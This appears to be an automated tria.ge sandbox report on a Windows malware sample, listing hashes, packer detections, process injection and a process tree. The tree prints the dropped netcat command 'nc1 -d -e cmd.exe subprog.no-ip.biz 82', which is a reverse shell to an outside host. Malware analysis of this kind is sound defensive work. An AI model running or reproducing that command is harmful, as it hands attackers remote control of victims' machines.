Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
max time kernel: 118s
max time network: 119s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 20/07/2024, 08:45
Behavioral task: behavioral1
Sample: 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
Resource: win7-20240708-en
General
Target: 5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
Size: 1.3MB
MD5: 5fce41613d2bb16e353e5546106568a0
SHA1: f8d76096e8cffe9ded2f1db2baf92e6a2d8edd02
SHA256: 4443e16cbcd67066f1c66a9eba5ebf8091b371582a784b81c1fcf117b307473b
SHA512: ce18f167146c13a5a328b8caa5cc774eec6543f37054ff2da261dab4190766d45249aa0b3a5f35d9d0d0ac0002c89465cb93757aca94f17d40b59a11243a18a7
SSDEEP: 24576:ttWcmES7iPyMHnz0iI85ZDuGX88PHKEHZyCyLyub8LlRHYt9N+KsTOrJZ:to797iKMHoi3PDXVPfHghyub8LL69NQ2
Malware Config
Signatures

Executes dropped EXE (1 IoCs)
pid   Process
2220  nc1.exe

Loads dropped DLL (2 IoCs)
pid   Process
3060  cmd.exe
3060  cmd.exe

resource                                                                      yara_rule
behavioral1/files/0x0008000000016d56-23.dat                                   themida
behavioral1/memory/2220-29-0x0000000000400000-0x0000000000518000-memory.dmp   themida

resource                                                                      yara_rule
behavioral1/memory/2068-0-0x0000000000400000-0x000000000057B000-memory.dmp    upx
behavioral1/memory/2068-34-0x0000000000400000-0x000000000057B000-memory.dmp   upx

Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (8 IoCs)
description                       pid   Process                                              procid_target
PID 2068 wrote to memory of 3060  2068  5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe  30
PID 2068 wrote to memory of 3060  2068  5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe  30
PID 2068 wrote to memory of 3060  2068  5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe  30
PID 2068 wrote to memory of 3060  2068  5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe  30
PID 3060 wrote to memory of 2220  3060  cmd.exe                                              32
PID 3060 wrote to memory of 2220  3060  cmd.exe                                              32
PID 3060 wrote to memory of 2220  3060  cmd.exe                                              32
PID 3060 wrote to memory of 2220  3060  cmd.exe                                              32
Processes

1. C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe
   command line: "C:\Users\Admin\AppData\Local\Temp\5fce41613d2bb16e353e5546106568a0_JaffaCakes118.exe"
   PID: 2068
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\cmd.exe (child of PID 2068)
      command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\C41A.tmp\moi.bat" C:\Users\Admin\AppData\Local\Temp\"
      PID: 3060
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory

      3. C:\Users\Admin\AppData\Local\Temp\C41A.tmp\nc1.exe (child of PID 3060)
         command line: nc1 -d -e cmd.exe subprog.no-ip.biz 82
         PID: 2220
         - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 55B
MD5: b10865d09b79c801d0ed79c38e1148b2
SHA1: 927d484b37376dcb0a8223f89f06923664f75d3d
SHA256: 7478f318af4b1dcb082609f0019ae994b58b8fc0e7ac2c278d9547c71c7fabf8
SHA512: 89c21f6aec91738a60e9a849e0b0ceca330dab365b2c36e1c62a84b940bfd6921bb19381d5acfad18e169f4dd1ba0d2a85d5f0bdea1e3e721535c76e3c437768

Filesize: 1.1MB
MD5: a5923f2e7efaf747844e530baa7fe32a
SHA1: 285559a6bf798ce6e9a49a1db2795d89e12675a7
SHA256: 9dfaaa97fa17a13a490f3892bd4b3cb7c4424ab3607dcc00c3ab88987b7d7e30
SHA512: fc8e9589cf0dc8b86f4a8f79619d0844cb2651342e049630fe6e6a22dbde65151c0571ac521e8823e5c5aeb3219c7b780f928b146bb6c2d673674235bdaf542e